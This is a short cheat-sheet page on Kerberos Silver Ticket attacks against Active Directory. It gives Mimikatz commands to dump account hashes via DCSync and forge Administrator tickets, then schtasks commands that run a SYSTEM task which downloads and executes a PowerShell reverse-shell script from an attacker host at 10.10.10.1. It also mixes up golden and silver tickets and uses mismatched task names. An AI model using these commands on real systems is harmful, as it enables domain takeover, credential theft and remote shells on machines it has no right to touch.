Silver Ticket

Silver ticket is signed and encrypted with the target service account hash. Represents a valid TGS (for authorization) Requirements : • Domain SID • Service account /Machine Account hash • Domain name • SIDS (in Cross-Forest Attacks)

Extract krbtgt account hash 👍

Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'

• Domain SID 👍

whoami /all (of a domain user)

Adversary Forge Golden ticket in a Domain as follows 👍

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1- 5-
21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Command Execution using Silver Ticket

Adversaries create a silver ticket for HOST service which allows them to schedule a malicious task on the target

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-
5-21-xxxxxx-yyyy-zzzzz /target:exterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Schedule and execute a task on Remote Server

schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN “lateral" /TR
"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"

schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"

PreviousGolden Ticket Attacks NextAD Common Vulnerablities

Last updated 4 months ago